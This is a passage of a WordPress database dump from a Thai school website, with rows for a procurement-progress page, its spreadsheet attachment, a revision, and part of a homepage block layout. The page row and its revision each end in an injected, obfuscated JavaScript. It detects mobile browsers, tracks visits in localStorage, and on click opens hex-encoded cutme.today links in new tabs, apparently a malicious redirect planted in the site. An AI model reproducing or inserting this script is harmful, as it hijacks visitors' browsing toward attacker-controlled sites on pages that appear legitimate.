)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','publish','closed','closed','','%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%81%e0%b9%89%e0%b8%b2%e0%b8%a7%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad','','','2024-08-15 11:43:27','2024-08-15 04:43:27','',0,'http://pakhaeng.ssk.in.th/?page_id=851',0,'page','',0),
(852,1,'2024-08-15 11:43:12','2024-08-15 04:43:12','','o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','','closed','','o16%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%81%e0%b9%89%e0%b8%b2%e0%b8%a7%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89','','','2024-08-15 11:43:12','2024-08-15 04:43:12','',851,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx',0,'attachment','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',0),
(853,1,'2024-08-15 11:43:23','2024-08-15 04:43:23','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21143&authkey=!AAbw2pzEYUYQUVQ&em=2\" width=\"1500\" height=\"500\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:file {\"id\":852,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-281035fb-58c2-4d1a-a58d-c0677415c304\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-281035fb-58c2-4d1a-a58d-c0677415c304\">Download</a></div>\n<!-- /wp:file --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','closed','closed','','851-revision-v1','','','2024-08-15 11:43:23','2024-08-15 04:43:23','',851,'http://pakhaeng.ssk.in.th/?p=853',0,'revision','',0),
(854,1,'2024-08-15 11:45:32','2024-08-15 04:45:32','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist 